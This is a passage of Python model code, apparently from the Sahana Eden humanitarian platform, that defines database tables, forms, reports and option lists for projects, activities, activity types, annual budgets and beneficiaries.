add_component("org_sector",
project_project=dict(link="project_sector_project",
joinby="project_id",
key="sector_id",
actuate="hide"))
# Format needed by S3Filter
add_component("project_sector_project",
project_project="project_id")
# Themes
add_component("project_theme",
project_project=dict(link="project_theme_project",
joinby="project_id",
key="theme_id",
actuate="hide"))
# Format needed by S3Filter
add_component("project_theme_project",
project_project="project_id")
# DRR
if mode_drr:
add_component("project_drr",
project_project=dict(joinby="project_id",
multiple = False))
# ---------------------------------------------------------------------
# Project Human Resources
#
define_table("project_human_resource",
project_id(empty=False),
human_resource_id(empty=False),
*s3_meta_fields()
)
configure("project_human_resource",
onvalidation=self.project_human_resource_onvalidation,
list_fields=[#"project_id",
"human_resource_id$person_id",
"human_resource_id$organisation_id",
"human_resource_id$job_title",
"human_resource_id$status"
],
)
# ---------------------------------------------------------------------
# Pass names back to global scope (s3.*)
#
return dict(
project_project_id = project_id,
project_project_represent = project_represent,
project_hfa_opts = self.project_hfa_opts,
project_jnap_opts = self.project_jnap_opts,
project_pifacc_opts = self.project_pifacc_opts,
project_rfa_opts = self.project_rfa_opts,
project_theme_opts = self.project_theme_opts,
project_theme_helps = self.project_theme_helps,
project_hazard_opts = self.project_hazard_opts,
project_hazard_helps = self.project_hazard_helps,
)
# -------------------------------------------------------------------------
def defaults(self):
""" Safe defaults for model-global names if module is disabled """
dummy = S3ReusableField("dummy_id", "integer",
readable=False,
writable=False)
return dict(project_project_id = lambda **attr: dummy("project_id"),
)
# -------------------------------------------------------------------------
@staticmethod
def project_total_organisation_amount(row):
""" Total of project_organisation amounts for project"""
if "project_project" in row:
project_id = row["project_project.id"]
elif "id" in row:
project_id = row["id"]
else:
return 0
table = current.s3db.project_organisation
query = (table.deleted != True) & \
(table.project_id == project_id)
sum_field = table.amount.sum()
return current.db(query).select(sum_field).first()[sum_field]
# -------------------------------------------------------------------------
@staticmethod
def project_total_annual_budget(row):
""" Total of all annual budgets for project"""
if "project_project" in row:
project_id = row["project_project.id"]
elif "id" in row:
project_id = row["id"]
else:
return 0
table = current.s3db.project_annual_budget
query = (table.deleted != True) & \
(table.project_id == project_id)
sum_field = table.amount.sum()
return current.db(query).select(sum_field).first()[sum_field] or \
current.messages["NONE"]
# -------------------------------------------------------------------------
@staticmethod
def project_project_onaccept(form):
"""
After DB I/O tasks for Project records
"""
settings = current.deployment_settings
if settings.get_project_multiple_organisations():
# Create/update project_organisation record from the organisation_id
# (Not in form.vars if added via component tab)
vars = form.vars
id = vars.id
organisation_id = vars.organisation_id or \
current.request.post_vars.organisation_id
if organisation_id:
lead_role = settings.get_project_organisation_lead_role()
otable = current.s3db.project_organisation
query = (otable.project_id == id) & \
(otable.role == lead_role)
# Update the lead organisation
count = current.db(query).update(organisation_id = organisation_id)
if not count:
# If there is no record to update, then create a new one
otable.insert(project_id = id,
organisation_id = organisation_id,
role = lead_role,
)
# -------------------------------------------------------------------------
@staticmethod
def project_project_deduplicate(item):
""" Import item de-duplication """
if item.tablename == "project_project":
data = item.data
table = item.table
# If we have a code, then assume this is unique, however the same
# project name may be used in multiple locations
if "code" in data and data.code:
query = (table.code.lower() == data.code.lower())
elif "name" in data and data.name:
query = (table.name.lower() == data.name.lower())
else:
# Nothing we can work with
return
duplicate = current.db(query).select(table.id,
limitby=(0, 1)).first()
if duplicate:
item.id = duplicate.id
item.method = item.METHOD.UPDATE
return
# -------------------------------------------------------------------------
@staticmethod
def project_map(r, **attr):
"""
Display a filterable set of Projects on a Map
- assumes mode_3w
- currently assumes that theme_percentages=True
@ToDo: Browse by Year
"""
if r.representation == "html" and \
r.name == "project":
T = current.T
db = current.db
s3db = current.s3db
response = current.response
ptable = s3db.project_project
ttable = s3db.project_theme
tptable = s3db.project_theme_project
ltable = s3db.gis_location
# Search Widget
themes_dropdown = SELECT(_multiple=True,
_id="project_theme_id",
_style="height:80px;")
append = themes_dropdown.append
table = current.s3db.project_theme
themes = current.db(table.deleted == False).select(table.id,
table.name,
orderby=table.name)
for theme in themes:
append(OPTION(theme.name,
_value=theme.id,
_selected="selected"))
form = FORM(themes_dropdown)
# Map
# The Layer of Projects to show on the Map
# @ToDo: Create a URL to the project_polygons custom method & use that
# @ToDo: Pass through attributes that we don't need for the 1st level of mapping
# so that they can be used without a screen refresh
url = URL(f="location", extension="geojson")
layer = {"name" : T("Projects"),
"id" : "projects",
"tablename" : "project_location",
"url" : url,
"active" : True,
#"marker" : None,
}
map = current.gis.show_map(collapsed = True,
feature_resources = [layer],
)
output = dict(title = T("Projects Map"),
form = form,
map = map,
)
# Add Static JS
response.s3.scripts.append(URL(c="static",
f="scripts",
args=["S3", "s3.project_map.js"]))
response.view = "map.html"
return output
else:
raise HTTP(501, current.messages.BADMETHOD)
# -------------------------------------------------------------------------
@staticmethod
def project_polygons(r, **attr):
"""
Export Projects as GeoJSON Polygons to view on the map
- currently assumes that theme_percentages=True
@ToDo: complete
"""
db = current.db
s3db = current.s3db
ptable = s3db.project_project
ttable = s3db.project_theme
tptable = s3db.project_theme_project
pltable = s3db.project_location
ltable = s3db.gis_location
vars = current.request.get_vars
themes = db(ttable.deleted == False).select(ttable.id,
ttable.name,
orderby = ttable.name)
# Total the Budget spent by Theme for each country
countries = {}
query = (ptable.deleted == False) & \
(tptable.project_id == ptable.id) & \
(ptable.id == pltable.project_id) & \
(ltable.id == pltable.location_id)
#if "theme_id" in vars:
# query = query & (tptable.id.belongs(vars.theme_id))
projects = db(query).select()
for project in projects:
# Only show those projects which are only within 1 country
# @ToDo
_countries = project.location_id
if len(_countries) == 1:
country = _countries[0]
if country in countries:
budget = project.project_project.total_annual_budget()
theme = project.project_theme_project.theme_id
percentage = project.project_theme_project.percentage
countries[country][theme] += budget * percentage
else:
name = db(ltable.id == country).select(ltable.name).first().name
countries[country] = dict(name = name)
# Init all themes to 0
for theme in themes:
countries[country][theme.id] = 0
# Add value for this record
budget = project.project_project.total_annual_budget()
theme = project.project_theme_project.theme_id
percentage = project.project_theme_project.percentage
countries[country][theme] += budget * percentage
query = (ltable.id.belongs(countries))
locations = db(query).select(ltable.id,
ltable.wkt)
for location in locations:
pass
# Convert to GeoJSON
output = json.dumps({})
current.response.headers["Content-Type"] = "application/json"
return output
# -------------------------------------------------------------------------
@staticmethod
def project_timeline(r, **attr):
"""
Display the project on a Simile Timeline
http://www.simile-widgets.org/wiki/Reference_Documentation_for_Timeline
Currently this just displays a Google Calendar
@ToDo: Add Milestones
@ToDo: Filters for different 'layers'
@ToDo: export milestones/tasks as .ics
"""
if r.representation == "html" and r.name == "project":
appname = current.request.application
response = current.response
s3 = response.s3
calendar = r.record.calendar
# Add core Simile Code
s3.scripts.append("/%s/static/scripts/simile/timeline/timeline-api.js" % appname)
# Pass vars to our JS code
s3.js_global.append('''S3.timeline.calendar="%s"''' % calendar)
# Add our control script
if s3.debug:
s3.scripts.append("/%s/static/scripts/S3/s3.timeline.js" % appname)
else:
s3.scripts.append("/%s/static/scripts/S3/s3.timeline.min.js" % appname)
# Create the DIV
item = DIV(_id="s3timeline",
_style="height:400px;border:1px solid #aaa;font-family:Trebuchet MS,sans-serif;font-size:85%;")
output = dict(item=item)
output["title"] = current.T("Project Calendar")
# Maintain RHeader for consistency
if "rheader" in attr:
rheader = attr["rheader"](r)
if rheader:
output["rheader"] = rheader
response.view = "timeline.html"
return output
else:
raise HTTP(501, current.messages.BADMETHOD)
# -------------------------------------------------------------------------
@staticmethod
def project_human_resource_onvalidation(form):
"""
Prevent the same hrm_human_resource record being added more than
once.
"""
# The project human resource table
hr = current.s3db.project_human_resource
# Fetch the first row that has the same project and human resource ids
query = (hr.human_resource_id == form.vars.human_resource_id) & \
(hr.project_id == form.request_vars.project_id)
row = current.db(query).select(hr.id,
limitby=(0, 1)).first()
# If we found a row we have a duplicate. Return an error to the user.
if row:
form.errors.human_resource_id = current.T("Record already exists")
return
# -------------------------------------------------------------------------
@staticmethod
def project_hazard_opts():
"""
Provide the options for the Hazard search filter
- defined in the model used to ensure a good load order
"""
table = current.s3db.project_hazard
opts = current.db(table.deleted == False).select(table.id,
table.name,
orderby=table.name)
T = current.T
od = OrderedDict()
for opt in opts:
od[opt.id] = T(opt.name) if opt.name else ""
return od
# -------------------------------------------------------------------------
@staticmethod
def project_hazard_helps():
"""
Provide the help tooltips for the Hazard search filter
- defined in the model used to ensure a good load order
"""
table = current.s3db.project_hazard
opts = current.db(table.deleted == False).select(table.id,
table.comments)
T = current.T
d = {}
for opt in opts:
d[opt.id] = T(opt.comments) if opt.comments else ""
return d
# -------------------------------------------------------------------------
@staticmethod
def project_hfa_opts():
"""
Provide the options for the HFA search filter
- defined in the model used to ensure a good load order
HFA: Hyogo Framework Agreement
"""
T = current.T
return {
1: T("HFA1: Ensure that disaster risk reduction is a national and a local priority with a strong institutional basis for implementation."),
2: T("HFA2: Identify, assess and monitor disaster risks and enhance early warning."),
3: T("HFA3: Use knowledge, innovation and education to build a culture of safety and resilience at all levels."),
4: T("HFA4: Reduce the underlying risk factors."),
5: T("HFA5: Strengthen disaster preparedness for effective response at all levels."),
}
# -------------------------------------------------------------------------
@staticmethod
def project_jnap_opts():
"""
Provide the options for the PIFACC search filter (currently unused)
- defined in the model used to ensure a good load order
JNAP (Joint National Action Plan for Disaster Risk Management and Climate Change Adaptation):
applies to Cook Islands only
"""
T = current.T
return {
1: T("JNAP-1: Strategic Area 1: Governance"),
2: T("JNAP-2: Strategic Area 2: Monitoring"),
3: T("JNAP-3: Strategic Area 3: Disaster Management"),
4: T("JNAP-4: Strategic Area 4: Risk Reduction and Climate Change Adaptation"),
}
# -------------------------------------------------------------------------
@staticmethod
def project_pifacc_opts():
"""
Provide the options for the PIFACC search filter (currently unused)
- defined in the model used to ensure a good load order
PIFACC (Pacific Islands Framework for Action on Climate Change):
applies to Pacific countries only
"""
T = current.T
return {
1: T("PIFACC-1: Implementing Tangible, On-Ground Adaptation Measures"),
2: T("PIFACC-2: Governance and Decision Making"),
3: T("PIFACC-3: Improving our understanding of climate change"),
4: T("PIFACC-4: Education, Training and Awareness"),
5: T("PIFACC-5: Mitigation of Global Greenhouse Gas Emissions"),
6: T("PIFACC-6: Partnerships and Cooperation"),
}
# -------------------------------------------------------------------------
@staticmethod
def project_rfa_opts():
"""
Provide the options for the RFA search filter
- defined in the model used to ensure a good load order
RFA: applies to Pacific countries only
"""
T = current.T
return {
1: T("RFA1: Governance-Organisational, Institutional, Policy and Decision Making Framework"),
2: T("RFA2: Knowledge, Information, Public Awareness and Education"),
3: T("RFA3: Analysis and Evaluation of Hazards, Vulnerabilities and Elements at Risk"),
4: T("RFA4: Planning for Effective Preparedness, Response and Recovery"),
5: T("RFA5: Effective, Integrated and People-Focused Early Warning Systems"),
6: T("RFA6: Reduction of Underlying Risk Factors"),
}
# -------------------------------------------------------------------------
@staticmethod
def project_theme_opts():
"""
Provide the options for the Theme search filter
- defined in the model used to ensure a good load order
"""
table = current.s3db.project_theme
opts = current.db(table.deleted == False).select(table.id,
table.name,
orderby=table.name)
T = current.T
od = OrderedDict()
for opt in opts:
od[opt.id] = T(opt.name) if opt.name else ""
return od
# -------------------------------------------------------------------------
@staticmethod
def project_theme_helps():
"""
Provide the help tooltips for the Theme search filter
- defined in the model used to ensure a good load order
"""
table = current.s3db.project_theme
opts = current.db(table.deleted == False).select(table.id,
table.comments)
T = current.T
d = {}
for opt in opts:
d[opt.id] = T(opt.comments) if opt.comments else ""
return d
# =============================================================================
class S3ProjectActivityModel(S3Model):
"""
Project Activity Model
This model holds the specific Activities for Projects
- currently used in mode_task but not mode_3w
"""
names = ["project_activity",
"project_activity_id",
"project_activity_activity_type",
]
def model(self):
T = current.T
db = current.db
add_component = self.add_component
crud_strings = current.response.s3.crud_strings
define_table = self.define_table
settings = current.deployment_settings
mode_task = settings.get_project_mode_task()
# ---------------------------------------------------------------------
# Project Activity
#
tablename = "project_activity"
table = define_table(tablename,
# Instance
self.super_link("doc_id", "doc_entity"),
s3_datetime(),
self.project_project_id(),
Field("name",
label = T("Name"),
requires = IS_NOT_EMPTY()
),
self.project_activity_type_id(),
self.gis_location_id(
widget = S3LocationSelectorWidget(hide_address=True)
),
# Which contact is this?
# Implementing Org should be a human_resource_id
# Beneficiary could be a person_id
# Either way label should be clear
self.pr_person_id(label=T("Contact Person")),
Field("time_estimated", "double",
readable = mode_task,
writable = mode_task,
label = "%s (%s)" % (T("Time Estimate"),
T("hours"))
),
Field("time_actual", "double",
readable = mode_task,
# Gets populated from constituent Tasks
writable = False,
label = "%s (%s)" % (T("Time Taken"),
T("hours"))
),
s3_comments(),
*s3_meta_fields())
# CRUD Strings
ACTIVITY = T("Activity")
ACTIVITY_TOOLTIP = T("If you don't see the activity in the list, you can add a new one by clicking link 'Add Activity'.")
ADD_ACTIVITY = T("Add Activity")
crud_strings[tablename] = Storage(
title_create = ADD_ACTIVITY,
title_display = T("Activity Details"),
title_list = T("Activities"),
title_update = T("Edit Activity"),
title_search = T("Search Activities"),
title_upload = T("Import Activity Data"),
title_report = T("Activity Report"),
subtitle_create = T("Add New Activity"),
label_list_button = T("List Activities"),
label_create_button = ADD_ACTIVITY,
msg_record_created = T("Activity Added"),
msg_record_modified = T("Activity Updated"),
msg_record_deleted = T("Activity Deleted"),
msg_list_empty = T("No Activities Found")
)
# Search Method
filter_widgets = [S3OptionsFilter("activity_type_id",
label=T("Type"),
represent="%(name)s",
widget="multiselect",
),
]
# Resource Configuration
report_fields = []
append = report_fields.append
append((T("Project"), "project_id"))
append((T("Activity"), "name"))
append((T("Activity Type"), "activity_type.name"))
if settings.get_project_sectors():
append((T("Sector"), "project_id$sector.name"))
append((T("Theme"), "project_id$theme.name"))
if settings.get_project_mode_drr():
append((T("Hazard"), "project_id$hazard.name"))
append((T("HFA"), "project_id$drr.hfa"))
list_fields = ["name",
"project_id",
"activity_type.name",
"comments"
]
if mode_task:
list_fields.insert(3, "time_estimated")
list_fields.insert(4, "time_actual")
append((T("Time Estimated"), "time_estimated"))
append((T("Time Actual"), "time_actual"))
#create_next = URL(c="project", f="activity",
# args=["[id]", "task"])
#else:
# create_next = URL(c="project", f="activity", args=["[id]"])
self.configure(tablename,
super_entity="doc_entity",
# Leave these workflows for Templates
#create_next=create_next,
deduplicate=self.project_activity_deduplicate,
filter_widgets = filter_widgets,
report_options=Storage(
rows=report_fields,
cols=report_fields,
fact=report_fields,
defaults=Storage(
rows="activity.project_id",
cols="activity.name",
fact="sum(activity.time_actual)",
totals=True
)
),
list_fields = list_fields,
)
# Reusable Field
activity_id = S3ReusableField("activity_id", table,
sortby="name",
requires = IS_NULL_OR(
IS_ONE_OF(db, "project_activity.id",
self.project_activity_represent,
sort=True)),
represent = self.project_activity_represent,
label = ACTIVITY,
comment = S3AddResourceLink(ADD_ACTIVITY,
c="project", f="activity",
tooltip=ACTIVITY_TOOLTIP),
ondelete = "CASCADE")
# Components
# Activity Types
add_component("project_activity_type",
project_activity=dict(link="project_activity_activity_type",
joinby="activity_id",
key="activity_type_id",
actuate="replace",
autocomplete="name",
autodelete=False))
# Beneficiaries
add_component("project_beneficiary",
project_activity=dict(link="project_beneficiary_activity",
joinby="activity_id",
key="beneficiary_id",
actuate="hide"))
# Format for InlineComponent/filter_widget
add_component("project_beneficiary_activity",
project_activity="activity_id")
# Tasks
add_component("project_task",
project_activity=dict(link="project_task_activity",
joinby="activity_id",
key="task_id",
actuate="replace",
autocomplete="name",
autodelete=False))
# Coalitions
add_component("org_group",
project_activity=dict(link="project_activity_group",
joinby="activity_id",
key="group_id",
actuate="hide"))
# Format for InlineComponent/filter_widget
add_component("project_activity_group",
project_activity="activity_id")
# ---------------------------------------------------------------------
# Activity Type - Activity Link Table
#
tablename = "project_activity_activity_type"
table = define_table(tablename,
activity_id(empty=False),
self.project_activity_type_id(empty=False),
*s3_meta_fields())
crud_strings[tablename] = Storage(
title_create = T("New Activity Type"),
title_display = T("Activity Type"),
title_list = T("Activity Types"),
title_update = T("Edit Activity Type"),
title_search = T("Search Activity Types"),
title_upload = T("Import Activity Type data"),
subtitle_create = T("Add New Activity Type"),
label_list_button = T("List Activity Types"),
label_create_button = T("Add Activity Type to Activity"),
msg_record_created = T("Activity Type added to Activity"),
msg_record_modified = T("Activity Type Updated"),
msg_record_deleted = T("Activity Type removed from Activity"),
msg_list_empty = T("No Activity Types found for this Activity")
)
# Activity Organization
add_component("project_activity_organisation",
project_activity="activity_id")
# Pass names back to global scope (s3.*)
return dict(project_activity_id = activity_id,
)
# -------------------------------------------------------------------------
def defaults(self):
""" Safe defaults for model-global names if module is disabled """
dummy = S3ReusableField("dummy_id", "integer",
readable=False,
writable=False)
return dict(project_activity_id = lambda **attr: dummy("activity_id"),
)
# -------------------------------------------------------------------------
@staticmethod
def project_activity_represent(id, row=None):
"""
Show activities with a prefix of the project code
"""
if row:
activity = row
db = current.db
# Fetch the project record
ptable = db.project_project
project = db(ptable.id == row.project_id).select(ptable.code,
limitby=(0, 1)).first()
elif not id:
return current.messages["NONE"]
else:
db = current.db
table = db.project_activity
ptable = db.project_project
left = ptable.on(ptable.id == table.project_id)
row = db(table.id == id).select(table.name,
table.project_id,
ptable.code,
left=left,
limitby=(0, 1)).first()
try:
project = row[ptable]
activity = row[table]
except:
return current.messages.UNKNOWN_OPT
if project and project.code:
return "%s > %s" % (project.code, activity.name)
else:
return activity.name
# -------------------------------------------------------------------------
@staticmethod
def project_activity_deduplicate(item):
""" Import item de-duplication """
if item.tablename != "project_activity":
return
data = item.data
if "project_id" in data and \
"name" in data:
# Match activity by project_id and name
project_id = data.project_id
name = data.name
table = item.table
query = (table.project_id == project_id) & \
(table.name == name)
duplicate = current.db(query).select(table.id,
limitby=(0, 1)).first()
if duplicate:
item.id = duplicate.id
item.method = item.METHOD.UPDATE
# =============================================================================
class S3ProjectActivityTypeModel(S3Model):
"""
Project Activity Type Model
This model holds the Activity Types for Projects
- it is useful where we don't have the details on the actual Activities,
but just this summary of Types
"""
names = ["project_activity_type",
"project_activity_type_location",
"project_activity_type_project",
"project_activity_type_sector",
"project_activity_type_id",
]
def model(self):
T = current.T
db = current.db
crud_strings = current.response.s3.crud_strings
define_table = self.define_table
# ---------------------------------------------------------------------
# Activity Types
#
tablename = "project_activity_type"
table = define_table(tablename,
Field("name", length=128,
notnull=True, unique=True),
s3_comments(),
*s3_meta_fields())
# CRUD Strings
ADD_ACTIVITY_TYPE = T("Add Activity Type")
crud_strings[tablename] = Storage(
title_create = ADD_ACTIVITY_TYPE,
title_display = T("Activity Type"),
title_list = T("Activity Types"),
title_update = T("Edit Activity Type"),
title_search = T("Search for Activity Type"),
subtitle_create = T("Add New Activity Type"),
label_list_button = T("List Activity Types"),
label_create_button = ADD_ACTIVITY_TYPE,
msg_record_created = T("Activity Type Added"),
msg_record_modified = T("Activity Type Updated"),
msg_record_deleted = T("Activity Type Deleted"),
msg_list_empty = T("No Activity Types Found")
)
# Reusable Fields
represent = S3Represent(lookup=tablename, translate=True)
activity_type_id = S3ReusableField("activity_type_id", table,
sortby = "name",
requires = IS_NULL_OR(
IS_ONE_OF(db, "project_activity_type.id",
represent,
sort=True)),
represent = represent,
label = T("Activity Type"),
comment = S3AddResourceLink(title=ADD_ACTIVITY_TYPE,
c="project",
f="activity_type",
tooltip=T("If you don't see the type in the list, you can add a new one by clicking link 'Add Activity Type'.")),
ondelete = "SET NULL")
# Component (for Custom Form)
self.add_component("project_activity_type_sector",
project_activity_type="activity_type_id")
crud_form = S3SQLCustomForm(
"name",
# Sectors
S3SQLInlineComponent(
"activity_type_sector",
label=T("Sectors to which this Activity Type can apply"),
fields=["sector_id"],
),
)
self.configure(tablename,
crud_form=crud_form,
list_fields=["id",
"name",
(T("Sectors"), "activity_type_sector.sector_id"),
"comments",
])
# ---------------------------------------------------------------------
# Activity Type - Sector Link Table
#
tablename = "project_activity_type_sector"
table = define_table(tablename,
activity_type_id(empty=False),
self.org_sector_id(label="",
empty=False),
*s3_meta_fields())
# ---------------------------------------------------------------------
# Activity Type - Project Location Link Table
#
tablename = "project_activity_type_location"
table = define_table(tablename,
activity_type_id(empty=False),
self.project_location_id(empty=False),
*s3_meta_fields())
# ---------------------------------------------------------------------
# Activity Type - Project Link Table
#
tablename = "project_activity_type_project"
table = define_table(tablename,
activity_type_id(empty=False),
self.project_project_id(empty=False),
*s3_meta_fields())
crud_strings[tablename] = Storage(
title_create = T("New Activity Type"),
title_display = T("Activity Type"),
title_list = T("Activity Types"),
title_update = T("Edit Activity Type"),
title_search = T("Search Activity Types"),
title_upload = T("Import Activity Type data"),
subtitle_create = T("Add New Activity Type"),
label_list_button = T("List Activity Types"),
label_create_button = T("Add Activity Type to Project Location"),
msg_record_created = T("Activity Type added to Project Location"),
msg_record_modified = T("Activity Type Updated"),
msg_record_deleted = T("Activity Type removed from Project Location"),
msg_list_empty = T("No Activity Types found for this Project Location")
)
# Pass names back to global scope (s3.*)
return dict(project_activity_type_id = activity_type_id,
)
# =============================================================================
class S3ProjectActivityOrganisationModel(S3Model):
"""
Project Activity Organisation Model
This model holds the Activity Organisations for Projects
- it is useful where we don't have the details on the actual Activities,
but just this summary of Organisations
"""
names = ["project_activity_organisation",
"project_activity_group",
]
def model(self):
T = current.T
define_table = self.define_table
project_activity_id = self.project_activity_id
# ---------------------------------------------------------------------
# Activities <> Organisations - Link table
#
tablename = "project_activity_organisation"
table = define_table(tablename,
project_activity_id(empty=False),
self.org_organisation_id(empty=False),
*s3_meta_fields())
# CRUD Strings
ADD_ACTIVITY_ORG = T("Add Activity Organisation")
current.response.s3.crud_strings[tablename] = Storage(
title_create = ADD_ACTIVITY_ORG,
title_display = T("Activity Organisation"),
title_list = T("Activity Organisations"),
title_update = T("Edit Activity Organisation"),
title_search = T("Search for Activity Organisation"),
subtitle_create = T("Add New Activity Organisation"),
label_list_button = T("List Activity Organisations"),
label_create_button = ADD_ACTIVITY_ORG,
msg_record_created = T("Activity Organisation Added"),
msg_record_modified = T("Activity Organisation Updated"),
msg_record_deleted = T("Activity Organisation Deleted"),
msg_list_empty = T("No Activity Organisations Found")
)
# ---------------------------------------------------------------------
# Activities <> Organisation Groups - Link table
#
tablename = "project_activity_group"
table = define_table(tablename,
project_activity_id(empty=False),
self.org_group_id(empty=False),
*s3_meta_fields())
# Pass names back to global scope (s3.*)
return dict()
# =============================================================================
class S3ProjectAnnualBudgetModel(S3Model):
"""
Project Budget Model
This model holds the annual budget entries for projects
"""
names = ["project_annual_budget"]
def model(self):
T = current.T
db = current.db
# ---------------------------------------------------------------------
# Annual Budgets
#
tablename = "project_annual_budget"
self.define_table(tablename,
self.project_project_id(
# Override requires so that update access to the projects isn't required
requires = IS_ONE_OF(db, "project_project.id",
self.project_project_represent
)
),
Field("year", "integer", notnull=True,
default=None, # make it current year
requires=IS_INT_IN_RANGE(1950, 3000),
label=T("Year"),
),
Field("amount", "double", notnull=True,
default=0.00,
requires=IS_FLOAT_AMOUNT(),
label=T("Amount"),
),
s3_currency(required=True),
*s3_meta_fields())
# CRUD Strings
current.response.s3.crud_strings[tablename] = Storage(
title_create = T("New Annual Budget"),
title_display = T("Annual Budget"),
title_list = T("Annual Budgets"),
title_update = T("Edit Annual Budget"),
title_search = T("Search Annual Budgets"),
title_upload = T("Import Annual Budget data"),
title_report = T("Report on Annual Budgets"),
subtitle_create = T("Add New Annual Budget"),
label_list_button = T("List Annual Budgets"),
label_create_button = T("New Annual Budget"),
msg_record_created = T("New Annual Budget created"),
msg_record_modified = T("Annual Budget updated"),
msg_record_deleted = T("Annual Budget deleted"),
msg_list_empty = T("No annual budgets found")
)
self.configure(tablename,
list_fields=["id",
"year",
"amount",
"currency",
]
)
# Pass names back to global scope (s3.*)
return dict()
# =============================================================================
class S3ProjectBeneficiaryModel(S3Model):
"""
Project Beneficiary Model
- depends on Stats module
"""
names = ["project_beneficiary_type",
"project_beneficiary",
]
def model(self):
if not current.deployment_settings.has_module("stats"):
# Beneficiary Model needs Stats module enabling
return dict()
T = current.T
db = current.db
configure = self.configure
crud_strings = current.response.s3.crud_strings
define_table = self.define_table
super_link = self.super_link
# ---------------------------------------------------------------------
# Project Beneficiary Type
#
tablename = "project_beneficiary_type"
table = define_table(tablename,
super_link("parameter_id", "stats_parameter"),
Field("name", length=128, unique=True,
requires = IS_NOT_IN_DB(db,
"project_beneficiary_type.name")),
s3_comments("description",
label = T("Description")),
*s3_meta_fields())
# CRUD Strings
ADD_BNF_TYPE = T("Add Beneficiary Type")
crud_strings[tablename] = Storage(
title_create = ADD_BNF_TYPE,
title_display = T("Beneficiary Type"),
title_list = T("Beneficiary Types"),
title_update = T("Edit Beneficiary Type"),
title_search = T("Search Beneficiary Types"),
subtitle_create = T("Add New Beneficiary Type"),
label_list_button = T("List Beneficiary Types"),
label_create_button = ADD_BNF_TYPE,
msg_record_created = T("Beneficiary Type Added"),
msg_record_modified = T("Beneficiary Type Updated"),
msg_record_deleted = T("Beneficiary Type Deleted"),
msg_list_empty = T("No Beneficiary Types Found")
)
# Resource Configuration
configure(tablename,
super_entity = "stats_parameter",
)
# ---------------------------------------------------------------------
# Project Beneficiary
#
# @ToDo: Split project_id & project_location_id to separate Link Tables
#
tablename = "project_beneficiary"
table = define_table(tablename,
# Link Fields
# populated automatically
self.project_project_id(readable=False,
writable=False),
self.project_location_id(comment=None),
# Instance
super_link("data_id", "stats_data"),
# This is a component, so needs to be a super_link
# - can't override field name, ondelete or requires
super_link("parameter_id", "stats_parameter",
label = T("Beneficiary Type"),
instance_types = ["project_beneficiary_type"],
represent = S3Represent(lookup="stats_parameter",
translate=True,
),
readable = True,
writable = True,
empty = False,
comment = S3AddResourceLink(c="project",
f="beneficiary_type",
vars = dict(child = "parameter_id"),
title=ADD_BNF_TYPE,
tooltip=T("Please record Beneficiary according to the reporting needs of your project")),
),
# Populated automatically from project_location
self.gis_location_id(readable = False,
writable = False),
Field("value", "integer",
label = T("Quantity"),
requires = IS_INT_IN_RANGE(0, 99999999),
represent = lambda v: \
IS_INT_AMOUNT.represent(v)
),
s3_date("date",
label = T("Start Date"),
#empty = False,
),
s3_date("end_date",
label = T("End Date"),
#empty = False,
),
#self.stats_source_id(),
s3_comments(),
*s3_meta_fields())
# Virtual fields
table.year = Field.Lazy(self.project_beneficiary_year)
# CRUD Strings
ADD_BNF = T("Add Beneficiaries")
crud_strings[tablename] = Storage(
title_create = ADD_BNF,
title_display = T("Beneficiaries Details"),
title_list = T("Beneficiaries"),
title_update = T("Edit Beneficiaries"),
title_search = T("Search Beneficiaries"),
title_report = T("Beneficiary Report"),
subtitle_create = T("Add New Beneficiaries"),
label_list_button = T("List Beneficiaries"),
label_create_button = ADD_BNF,
msg_record_created = T("Beneficiaries Added"),
msg_record_modified = T("Beneficiaries Updated"),
msg_record_deleted = T("Beneficiaries Deleted"),
msg_list_empty = T("No Beneficiaries Found")
)
# Resource Configuration
report_fields = ["project_location_id",
(T("Beneficiary Type"), "parameter_id"),
"project_id",
(T("Year"), "year"),
"project_id$hazard.name",
"project_id$theme.name",
(current.messages.COUNTRY, "location_id$L0"),
"location_id$L1",
"location_id$L2",
"location_id$L3",
"location_id$L4",
]
# ---------------------------------------------------------------------
def year_options():
"""
returns a dict of the options for the year virtual field
used by the search widget
orderby needed for postgres
"""
ptable = db.project_project
pbtable = db.project_beneficiary
pquery = (ptable.deleted == False)
pbquery = (pbtable.deleted == False)
pmin = ptable.start_date.min()
pbmin = pbtable.date.min()
p_start_date_min = db(pquery).select(pmin,
orderby=pmin,
limitby=(0, 1)).first()[pmin]
pb_date_min = db(pbquery).select(pbmin,
orderby=pbmin,
limitby=(0, 1)).first()[pbmin]
if p_start_date_min and pb_date_min:
start_year = min(p_start_date_min,
pb_date_min).year
else:
start_year = (p_start_date_min and p_start_date_min.year) or \
(pb_date_min and pb_date_min.year)
pmax = ptable.end_date.max()
pbmax = pbtable.end_date.max()
p_end_date_max = db(pquery).select(pmax,
orderby=pmax,
limitby=(0, 1)).first()[pmax]
pb_end_date_max = db(pbquery).select(pbmax,
orderby=pbmax,
limitby=(0, 1)).first()[pbmax]
if p_end_date_max and pb_end_date_max:
end_year = max(p_end_date_max,
pb_end_date_max).year
else:
end_year = (p_end_date_max and p_end_date_max.year) or \
(pb_end_date_max and pb_end_date_max.year)
if not start_year or not end_year:
return {start_year:start_year} or {end_year:end_year}
years = {}
for year in xrange(start_year, end_year + 1):
years[year] = year
return years
configure(tablename,
super_entity = "stats_data",
onaccept=self.project_beneficiary_onaccept,
deduplicate=self.project_beneficiary_deduplicate,
report_options=Storage(
search=[
S3SearchOptionsWidget(
field="project_id",
name="project",
label=T("Project")
),
S3SearchOptionsWidget(
field="parameter_id",
name="parameter_id",
label=T("Beneficiary Type")
),
# @ToDo: These do no work - no results are returned
S3SearchOptionsWidget(
field="year",
name="year",
label=T("Year"),
options = year_options
),
S3SearchOptionsWidget(
name = "beneficiary_search_L1",
field = "location_id$L1",
location_level = "L1",
cols = 3,
),
],
rows=report_fields,
cols=report_fields,
fact=["value"],
methods=["sum"],
defaults=Storage(rows="beneficiary.project_id",
cols="beneficiary.parameter_id",
fact="beneficiary.value",
aggregate="sum",
totals=True
)
),
extra_fields = ["project_id", "date", "end_date"]
)
# Reusable Field
beneficiary_id = S3ReusableField("beneficiary_id", table,
sortby="name",
requires = IS_NULL_OR(
IS_ONE_OF(db, "project_beneficiary.id",
self.project_beneficiary_represent,
sort=True)),
represent = self.project_beneficiary_represent,
label = T("Beneficiaries"),
comment = S3AddResourceLink(c="project",
f="beneficiary",
title=ADD_BNF,
tooltip=\
T("If you don't see the beneficiary in the list, you can add a new one by clicking link 'Add Beneficiary'.")),
ondelete = "SET NULL")
# ---------------------------------------------------------------------
# Beneficiary <> Activity Link Table
#
